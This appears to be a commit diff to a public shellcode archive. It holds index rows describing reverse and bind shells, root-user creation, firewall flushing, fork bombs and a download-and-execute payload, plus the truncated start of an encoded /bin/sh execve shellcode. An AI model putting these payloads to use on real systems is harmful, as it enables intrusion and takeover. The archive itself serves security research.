588 40139 shellcodes/linux_x86-64/40139.c Linux/x86-64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes) Linux/x64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes) 2016-07-21 Kyzer shellcode linux_x86-64
589 40175 shellcodes/windows_x86/40175.c Windows/x86 (7) - localhost Port Scanner Shellcode (556 bytes) 2016-07-29 Roziul Hasan Khan Shifat shellcode windows_x86
590 40179 shellcodes/linux_x86/40179.c Linux/x86 - Bind TCP/UDP (98/TCP + UDP) Netcat Shell Shellcode (44/52 bytes) 2016-07-29 Kyzer shellcode linux_x86
591 40222 shellcodes/linux_x86/40222.c Linux/x86 - Bind TCP (9090/TCP) Shell (/bin/zsh) Shellcode (96 bytes) 2016-08-10 thryb shellcode linux_x86
592 40223 shellcodes/linux_x86/40223.c Linux/x86 - Reverse TCP (127.255.255.254:9090/TCP) Shell (/bin/zsh) Shellcode (80 bytes) 2016-08-10 thryb shellcode linux_x86
593 40245 shellcodes/windows_x86/40245.c Windows/x86 - MessageBoxA Shellcode (242 bytes) Windows/x86 - MessageBoxA() Shellcode (242 bytes) 2016-08-16 Roziul Hasan Khan Shifat shellcode windows_x86
594 40246 shellcodes/windows_x86/40246.c Windows/x86 - CreateProcessA cmd.exe Shellcode (253 bytes) 2016-08-16 Roziul Hasan Khan Shifat shellcode windows_x86
595 40259 shellcodes/windows_x86/40259.c Windows/x86 - InitiateSystemShutdownA() Shellcode (599 bytes) 2016-08-18 Roziul Hasan Khan Shifat shellcode windows_x86
596 43562 shellcodes/linux_x86-64/43562.c Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes) Linux/x64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes) 2009-01-01 Christophe G shellcode linux_x86-64
597 43563 shellcodes/linux_x86-64/43563.c Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes) Linux/x64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes) 2009-01-01 Christophe G shellcode linux_x86-64
598 43564 shellcodes/linux_x86-64/43564.c Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes) Linux/x64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes) 2009-01-01 Christophe G shellcode linux_x86-64
599 43565 shellcodes/linux_x86-64/43565.asm Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes) Linux/x64 - Read /etc/passwd Shellcode (82 bytes) 2009-01-01 Mr.Un1k0d3r shellcode linux_x86-64
600 43566 shellcodes/linux_x86-64/43566.asm Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes) Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes) 2009-01-01 Christophe G shellcode linux_x86-64
601 43568 shellcodes/linux_x86-64/43568.asm Linux/x86-64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes) Linux/x64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes) 2009-01-01 Andriy Brukhovetskyy shellcode linux_x86-64
602 43570 shellcodes/linux_x86-64/43570.asm Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes) Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes) 2009-01-01 Andriy Brukhovetskyy shellcode linux_x86-64
603 43597 shellcodes/linux_x86-64/43597.c Linux/x86-64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes) Linux/x64 - Bind TCP (Random TCP Port) Shell + Null-Free Shellcode (57 bytes) 2009-01-01 Geyslan G. Bem shellcode linux_x86-64
604 43598 shellcodes/linux_x86-64/43598.c Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes) Linux/x64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes) 2012-10-04 Russell Willis shellcode linux_x86-64
605 43599 shellcodes/linux_x86-64/43599.c Linux/x86-64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes) Linux/x64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes) 2012-10-04 Russell Willis shellcode linux_x86-64
606 43601 shellcodes/linux_x86-64/43601.asm Linux/x86-64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes) Linux/x64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes) 2009-01-01 Gaussillusion shellcode linux_x86-64
607 43602 shellcodes/linux_x86-64/43602.asm Linux/x86-64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes) Linux/x64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes) 2009-01-01 Gaussillusion shellcode linux_x86-64
608 43603 shellcodes/linux_x86-64/43603.c Linux/x86-64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes) Linux/x64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes) 2009-01-01 egeektronic shellcode linux_x86-64
609 43604 shellcodes/linux_x86-64/43604.c Linux/x86-64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes) Linux/x64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes) 2009-01-01 egeektronic shellcode linux_x86-64
610 43605 shellcodes/linux_x86-64/43605.c Linux/x86-64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes) Linux/x64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes) 2009-01-01 egeektronic shellcode linux_x86-64
611 43606 shellcodes/linux_x86-64/43606.c Linux/x86-64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes) Linux/x64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes) 2009-01-01 egeektronic shellcode linux_x86-64
612 43607 shellcodes/linux_x86-64/43607.c Linux/x86-64 - sethostname(Rooted !) + killall Shellcode (33 bytes) Linux/x64 - sethostname(Rooted !) + killall Shellcode (33 bytes) 2009-01-01 zbt shellcode linux_x86-64
613 43608 shellcodes/openbsd_x86/43608.c OpenBSD/x86 - reboot() Shellcode (15 bytes) 2009-01-01 beosroot shellcode openbsd_x86
614 43610 shellcodes/osx_ppc/43610.c OSX/PPC - Remote findsock by recv() Key Shellcode 2009-01-01 Dino Dai Zovi shellcode osx_ppc
615 43611 shellcodes/osx_ppc/43611.asm OSX/PPC - Reverse TCP Shell (/bin/csh) Shellcode 2009-01-01 H D Moore shellcode osx_ppc
755 43773 shellcodes/windows_x86/43773.c Windows/x86 (XP SP3) (English) - calc.exe Shellcode (16 bytes) 2010-07-10 John Leitch shellcode windows_x86
756 43774 shellcodes/windows_x86/43774.c Windows/x86 (XP SP3) - MessageBox Shellcode (11 bytes) 2009-01-01 d3c0der shellcode windows_x86
757 43778 shellcodes/arm/43778.asm Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes) 2018-01-15 rtmcx shellcode arm
758 40549 43890 shellcodes/windows_x86-64/40549.c shellcodes/linux_x86/43890.c Windows/x86-64 - WinExec(cmd.exe) Shellcode (93 bytes) Linux/x86 - execve(/bin/sh) + ROT-N + Shift-N + XOR-N Encoded Shellcode (77 bytes) 2016-10-17 2018-01-23 Roziul Hasan Khan Shifat Hashim Jawad shellcode windows_x86-64 linux_x86
759 40549 shellcodes/windows_x86-64/40549.c Windows/x64 - WinExec(cmd.exe) Shellcode (93 bytes) 2016-10-17 Roziul Hasan Khan Shifat shellcode windows_x86-64
760 40560 shellcodes/windows_x86/40560.asm Windows/x86 - Reverse UDP (www.example.com:4444/UDP) Keylogger Shellcode (493 bytes) 2016-10-17 Fugu shellcode windows_x86
761 40781 shellcodes/windows_x86-64/40781.c Windows/x86-64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes) Windows/x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes) 2016-11-18 Roziul Hasan Khan Shifat shellcode windows_x86-64
762 40808 shellcodes/linux_x86-64/40808.c Linux/x86-64 - execve(/bin/sh) -c reboot Shellcode (89 bytes) Linux/x64 - execve(/bin/sh) -c reboot Shellcode (89 bytes) 2016-11-22 Ashiyane Digital Security Team shellcode linux_x86-64
763 40821 shellcodes/windows_x86-64/40821.c Windows/x86-64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes) Windows/x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes) 2016-11-23 Roziul Hasan Khan Shifat shellcode windows_x86-64
764 40872 shellcodes/linux_x86/40872.c Linux/x86 - Reverse TCP Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes) 2016-12-05 Filippo Bersani shellcode linux_x86
765 40924 shellcodes/linux_x86/40924.c Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution + Null-Free Shellcode (72 bytes) 2016-12-16 Filippo Bersani shellcode linux_x86
766 40981 shellcodes/windows_x86-64/40981.c Windows/x86-64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes) Windows/x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes) 2017-01-01 Roziul Hasan Khan Shifat shellcode windows_x86-64
767 41072 shellcodes/windows_x86-64/41072.c Windows/x86-64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes) Windows/x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes) 2017-01-15 Roziul Hasan Khan Shifat shellcode windows_x86-64
768 41089 shellcodes/linux_x86-64/41089.c Linux/x86-64 - mkdir() Shellcode (25 bytes) Linux/x64 - mkdir() Shellcode (25 bytes) 2017-01-18 Ajith Kp shellcode linux_x86-64
769 41128 shellcodes/linux_x86-64/41128.c Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes) Linux/x64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes) 2017-01-19 Ajith Kp shellcode linux_x86-64
770 41174 shellcodes/linux_x86-64/41174.nasm Linux/x86-64 - execve(/bin/sh) Shellcode (22 bytes) Linux/x64 - execve(/bin/sh) Shellcode (22 bytes) 2017-01-26 Robert L. Taylor shellcode linux_x86-64
771 41183 shellcodes/linux/41183.c Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes) 2017-01-29 odzhancode shellcode linux
772 41220 shellcodes/generator/41220.c Linux - Reverse TCP Shell + Multi/Dual Mode Shellcode (129 bytes) (Generator) 2017-02-02 odzhancode shellcode generator
773 41282 shellcodes/linux_x86/41282.nasm Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Alphanumeric + Staged Shellcode (103 bytes) 2017-02-08 Snir Levi shellcode linux_x86
774 41375 shellcodes/linux/41375.c Linux - Bind TCP Shell + Dual/Multi Mode Shellcode (156 bytes) 2017-02-16 odzhancode shellcode linux
775 41381 shellcodes/windows_x86/41381.c Windows/x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes) 2017-02-17 Ege Balci shellcode windows_x86
776 41398 shellcodes/linux_x86-64/41398.nasm Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes) Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes) 2017-02-19 Robert L. Taylor shellcode linux_x86-64
777 41403 shellcodes/linux_x86/41403.c Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes) 2017-02-20 lu0xheap shellcode linux_x86
778 41439 shellcodes/linux_x86-64/41439.c Linux/x86-64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes) Linux/x64 - Egghunter (0xDEADC0DE) Shellcode (38 bytes) 2017-02-23 odzhancode shellcode linux_x86-64
779 41467 shellcodes/windows_x86/41467.c Windows/x86 - Executable Directory Search + Null-Free Shellcode (130 bytes) 2017-02-26 lu0xheap shellcode windows_x86
780 41468 shellcodes/linux_x86-64/41468.nasm Linux/x86-64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes) Linux/x64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes) 2017-02-26 Robert L. Taylor shellcode linux_x86-64
781 41477 shellcodes/linux_x86-64/41477.c Linux/x86-64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes) Linux/x64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes) 2017-02-28 Manuel Mancera shellcode linux_x86-64
782 41481 shellcodes/windows_x86/41481.asm Windows/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes) 2017-03-01 Snir Levi shellcode windows_x86
783 41498 shellcodes/linux_x86-64/41498.nasm Linux/x86-64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes) Linux/x64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes) 2017-03-03 Robert L. Taylor shellcode linux_x86-64
784 41503 shellcodes/linux_x86-64/41503.nasm Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes) Linux/x64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes) 2017-03-03 Robert L. Taylor shellcode linux_x86-64
785 41509 shellcodes/linux_x86-64/41509.nasm Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes) Linux/x64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes) 2017-03-04 Robert L. Taylor shellcode linux_x86-64
786 41510 shellcodes/linux_x86-64/41510.nsam Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes) Linux/x64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes) 2017-03-04 Robert L. Taylor shellcode linux_x86-64
787 41581 shellcodes/windows_x86/41581.c Windows/x86 - Hide Console Window Shellcode (182 bytes) 2017-03-11 Ege Balci shellcode windows_x86
788 43433 shellcodes/linux_x86/43433.c Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes) 2018-01-05 Nipun Jaswal shellcode linux_x86
789 43476 shellcodes/linux_x86/43476.c Linux/x86 - execve(/bin/dash) Shellcode (30 bytes) 2018-01-10 Hashim Jawad shellcode linux_x86
793 43483 shellcodes/bsd_x86/43483.c BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes) 2009-01-01 Jihyeog Lim shellcode bsd_x86
794 43489 shellcodes/linux_x86/43489.c Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (53 bytes) 2018-01-10 Debashis Pal shellcode linux_x86
795 43497 shellcodes/arm/43497.asm Linux/ARM (Raspberry Pi) - Bind TCP (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (112 bytes) 2018-01-11 Azeria shellcode arm
796 43502 shellcodes/freebsd_x86-64/43502.txt FreeBSD/x86-64 - execve(/bin/sh) Shellcode (28 bytes) FreeBSD/x64 - execve(/bin/sh) Shellcode (28 bytes) 2009-01-01 Gitsnik shellcode freebsd_x86-64
797 43503 shellcodes/freebsd_x86-64/43503.txt FreeBSD/x86-64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes) FreeBSD/x64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes) 2009-01-11 Gitsnik shellcode freebsd_x86-64
798 43504 shellcodes/freebsd_x86/43504.asm FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes) 2009-01-01 Tosh shellcode freebsd_x86
799 43505 shellcodes/freebsd_x86/43505.c FreeBSD/x86 - /sbin/pfctl -F all Shellcode (47 bytes) 2009-01-01 antrhacks shellcode freebsd_x86
800 43506 shellcodes/freebsd_x86/43506.c FreeBSD/x86 - Bind TCP (41254/TCP) Shell (/bin/sh) Shellcode (115 bytes) 2009-01-01 zillion shellcode freebsd_x86
818 43541 shellcodes/superh_sh4/43541.c Linux/SuperH (sh4) - execve(_/bin/sh__ 0_ 0) Shellcode (19 bytes) 2011-06-22 Florian Gaultier shellcode superh_sh4
819 43542 shellcodes/superh_sh4/43542.c Linux/SuperH (sh4) - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (132 bytes) 2009-01-01 Dad_ shellcode superh_sh4
820 43546 shellcodes/linux_sparc/43546.c Linux/SPARC - setreuid(0_0) + execve() Shellcode (72 bytes) 2009-01-01 Michel Kaempf shellcode linux_sparc
821 43549 shellcodes/linux_x86-64/43549.c Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes) Linux/x64 - Execute /bin/sh Shellcode (27 bytes) 2009-01-01 Dad_ shellcode linux_x86-64
822 43550 shellcodes/linux_x86-64/43550.c Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes) Linux/x64 - Execute /bin/sh Shellcode (24 bytes) 2018-01-13 0x4ndr3 shellcode linux_x86-64
823 43551 shellcodes/linux_x86-64/43551.c Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes) Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes) 2014-10-29 Osanda Malith Jayathissa shellcode linux_x86-64
824 43552 shellcodes/linux_x86-64/43552.c Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes) Linux/x64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes) 2018-01-13 0x4ndr3 shellcode linux_x86-64
825 43553 shellcodes/linux_x86-64/43553.c Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes) Linux/x64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes) 2018-01-13 0x4ndr3 shellcode linux_x86-64
826 43554 shellcodes/linux_x86-64/43554.c Linux/x86-64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes) Linux/x64 - Bind TCP (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes) 2009-01-01 Doreth.Z10 shellcode linux_x86-64
827 43555 shellcodes/linux_x86-64/43555.c Linux/x86-64 - shutdown -h now Shellcode (65 bytes) Linux/x64 - shutdown -h now Shellcode (65 bytes) 2014-06-27 Osanda Malith Jayathissa shellcode linux_x86-64
828 43556 shellcodes/linux_x86-64/43556.asm Linux/x86-64 - shutdown -h now Shellcode (64 bytes) Linux/x64 - shutdown -h now Shellcode (64 bytes) 2014-09-14 Keyman shellcode linux_x86-64
829 43557 shellcodes/linux_x86-64/43557.asm Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes) Linux/x64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes) 2014-09-14 Keyman shellcode linux_x86-64
830 43558 shellcodes/linux_x86-64/43558.asm Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes) Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes) 2014-09-04 Keyman shellcode linux_x86-64
831 43559 shellcodes/linux_x86-64/43559.asm Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes) Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes) 2014-09-03 Keyman shellcode linux_x86-64
832 43561 shellcodes/linux_x86-64/43561.asm Linux/x86-64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes) Linux/x64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes) 2014-09-21 Keyman shellcode linux_x86-64
833 41630 shellcodes/linux_x86/41630.asm Linux/x86 - exceve(/bin/sh) + Encoded Shellcode (44 bytes) 2017-03-17 WangYihang shellcode linux_x86
834 41631 shellcodes/linux_x86/41631.c Linux/x86 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes) 2017-03-17 Oleg Boytsev shellcode linux_x86
835 41635 shellcodes/linux_x86/41635.txt Linux/x86 - Read /etc/passwd Shellcode (54 bytes) 2017-03-19 WangYihang shellcode linux_x86
836 43734 shellcodes/linux_x86/43734.c Linux/x86 - Insertion Decoder + Null-Free Shellcode (33+ bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
837 42295 shellcodes/linux_x86/42295.c Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes) 2013-01-01 Geyslan G. Bem shellcode linux_x86
838 41723 shellcodes/linux_x86/41723.c Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes) 2017-03-24 JR0ch17 shellcode linux_x86
839 41750 shellcodes/linux_x86-64/41750.txt shellcodes/linux_x86-64/41750.asm Linux/x86-64 - execve(/bin/sh) Shellcode (21 bytes) Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) 2017-03-28 WangYihang shellcode linux_x86-64
840 41757 shellcodes/linux_x86/41757.txt Linux/x86 - execve(/bin/sh) Shellcode (21 bytes) (4) 2017-03-29 WangYihang shellcode linux_x86
841 41827 shellcodes/windows_x86-64/41827.txt shellcodes/windows_x86-64/41827.asm Windows/x86-64 (10) - Egghunter Shellcode (45 bytes) Windows/x64 (10) - Egghunter Shellcode (45 bytes) 2017-04-06 Peter Baris shellcode windows_x86-64
842 41883 shellcodes/linux_x86-64/41883.txt Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (2) Linux/x64 - execve(/bin/sh) Shellcode (31 bytes) (2) 2017-04-13 WangYihang shellcode linux_x86-64
843 41909 shellcodes/linux_x86/41909.c Linux/x86 - Egghunter (0x50905090) + /bin/sh Shellcode (18 bytes) 2017-04-22 phackt_ul shellcode linux_x86
844 41969 shellcodes/linux_x86/41969.c Linux/x86 - Disable ASLR Security Shellcode (80 bytes) 2017-05-08 abatchy17 shellcode linux_x86
845 41970 shellcodes/linux_x86-64/41970.asm Linux/x86-64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes) Linux/x64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes) 2017-05-08 Srakai shellcode linux_x86-64
846 42016 shellcodes/windows/42016.asm Windows/x86-64 / x86 - cmd.exe Shellcode (718 bytes) Windows - cmd.exe Shellcode (718 bytes) 2017-05-17 Filippo Bersani shellcode windows
847 42126 shellcodes/linux_x86-64/42126.c Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (1) Linux/x64 - execve(/bin/sh) Shellcode (31 bytes) (1) 2017-06-05 Touhid M.Shaikh shellcode linux_x86-64
848 42177 shellcodes/linux_x86/42177.c Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) + XOR Encoded Shellcode (66 bytes) 2017-06-15 nullparasite shellcode linux_x86
849 42179 shellcodes/linux_x86-64/42179.c Linux/x86-64 - execve(/bin/sh) Shellcode (24 bytes) Linux/x64 - execve(/bin/sh) Shellcode (24 bytes) 2017-06-15 m4n3dw0lf shellcode linux_x86-64
850 42208 shellcodes/linux_x86/42208.nasm Linux/x86 - Reverse UDP (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes) 2017-06-20 DONTON Fetenat C shellcode linux_x86
851 42254 shellcodes/linux_x86/42254.c Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (75 bytes) 2017-06-26 wetw0rk shellcode linux_x86
852 42339 shellcodes/linux_x86-64/42339.c Linux/x86-64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes) Linux/x64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes) 2017-07-19 m4n3dw0lf shellcode linux_x86-64
853 42428 shellcodes/linux_x86/42428.c Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (4) 2017-08-06 Touhid M.Shaikh shellcode linux_x86
854 42485 shellcodes/linux_x86-64/42485.c Linux/x86-64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes) Linux/x64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes) 2017-08-17 Touhid M.Shaikh shellcode linux_x86-64
855 42522 shellcodes/linux_x86-64/42522.c Linux/x86-64 - Kill All Processes Shellcode (19 bytes) Linux/x64 - Kill All Processes Shellcode (19 bytes) 2017-08-19 Touhid M.Shaikh shellcode linux_x86-64
856 42523 shellcodes/linux_x86-64/42523.c Linux/x86-64 - Fork Bomb Shellcode (11 bytes) Linux/x64 - Fork Bomb Shellcode (11 bytes) 2017-08-19 Touhid M.Shaikh shellcode linux_x86-64
857 42594 shellcodes/linux_x86/42594.c Linux/x86 - Fork Bomb Shellcode (9 bytes) 2017-08-30 Touhid M.Shaikh shellcode linux_x86
858 42646 shellcodes/arm/42646.c Linux/ARM (Raspberry Pi) - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (192 bytes) 2017-09-10 Andrea Sindoni shellcode arm
859 42647 shellcodes/arm/42647.c Linux/ARM (Raspberry Pi) - Reverse TCP (192.168.0.12:4444/TCP) Shell (/bin/sh) Shellcode (160 bytes) 2017-09-10 Andrea Sindoni shellcode arm
860 42791 shellcodes/linux_x86-64/42791.c Linux/x86-64 - mkdir(evil) Shellcode (30 bytes) Linux/x64 - mkdir(evil) Shellcode (30 bytes) 2017-09-25 Touhid M.Shaikh shellcode linux_x86-64
861 42977 shellcodes/linux_x86/42977.c Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (30 bytes) 2017-10-12 Manuel Mancera shellcode linux_x86
862 42992 shellcodes/windows_x86-64/42992.c Windows/x86-64 - API Hooking Shellcode (117 bytes) Windows/x64 - API Hooking Shellcode (117 bytes) 2017-10-16 Roziul Hasan Khan Shifat shellcode windows_x86-64
863 43463 shellcodes/linux_x86/43463.nasm Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes) 2018-01-04 Hashim Jawad shellcode linux_x86

0
shellcodes/arm/14113.txt → shellcodes/arm/14113.c
View file

0
shellcodes/arm/14116.txt → shellcodes/arm/14116.c
View file

0
shellcodes/arm/14122.txt → shellcodes/arm/14122.c
View file

0
shellcodes/generator/36411.txt → shellcodes/generator/36411.py Normal file → Executable file
View file

0
shellcodes/linux_x86-64/13915.txt → shellcodes/linux_x86-64/13915.c
View file

0
shellcodes/linux_x86-64/35205.txt → shellcodes/linux_x86-64/35205.asm
View file

0
shellcodes/linux_x86-64/40122.txt → shellcodes/linux_x86-64/40122.c
View file

0
shellcodes/linux_x86-64/41750.txt → shellcodes/linux_x86-64/41750.asm
View file

0
shellcodes/linux_x86/13424.txt → shellcodes/linux_x86/13424.c
View file

0
shellcodes/linux_x86/13578.txt → shellcodes/linux_x86/13578.asm
View file

0
shellcodes/linux_x86/13586.txt → shellcodes/linux_x86/13586.asm
View file

0
shellcodes/linux_x86/13599.txt → shellcodes/linux_x86/13599.c
View file

0
shellcodes/linux_x86/13600.txt → shellcodes/linux_x86/13600.c
View file

0
shellcodes/linux_x86/13601.txt → shellcodes/linux_x86/13601.c
View file

0
shellcodes/linux_x86/13602.txt → shellcodes/linux_x86/13602.c
View file

0
shellcodes/linux_x86/13703.txt → shellcodes/linux_x86/13703.c
View file

0
shellcodes/linux_x86/13725.txt → shellcodes/linux_x86/13725.c
View file

0
shellcodes/linux_x86/13726.txt → shellcodes/linux_x86/13726.c
View file

0
shellcodes/linux_x86/17194.txt → shellcodes/linux_x86/17194.c
View file

0
shellcodes/linux_x86/35519.txt → shellcodes/linux_x86/35519.c
View file

172
shellcodes/linux_x86/43890.c Normal file
View file

@ -0,0 +1,172 @@
/*
#################################### Description ####################################
; Title : [ROT-N + Shift-N + XOR-N] encoded /bin/sh - Shellcode
; Author : Hashim Jawad
; Blog Post : https://ihack4falafel.com/2018/01/rot-n-shift-n-xor-n-shellcode-encoder-linux-x86/
; Twitter : @ihack4falafel
; SLAE ID : SLAE-1115
; Purpose : spawn /bin/sh shell
; Tested On : Ubuntu 12.04.5 LTS
; Arch : x86
; Size : 77 bytes
##################################### sh.nasm ######################################
global _start
section .text
_start:
;
; execve() code block
;
xor eax,eax ; initiliaze EAX
push eax ; push null terminator
push 0x68732f2f ; push /bin//sh
push 0x6e69622f
xchg ebx,esp ; save stack pointer to EBX
